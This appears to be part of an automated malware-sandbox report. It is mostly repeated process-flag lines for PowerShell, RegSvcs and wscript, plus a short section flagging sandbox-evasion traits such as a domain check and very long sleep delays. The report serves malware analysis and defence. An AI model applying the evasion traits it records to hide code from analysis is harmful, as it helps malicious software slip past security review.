Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Potential evasive JS / VBS script found (domain check)

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: UserDomain();IWshNetwork2.UserName();IHost.CreateObject("WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2120	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4976	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4640	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 8016	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3148	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192	Thread sleep count: 4976 > 30	Jump to behavior
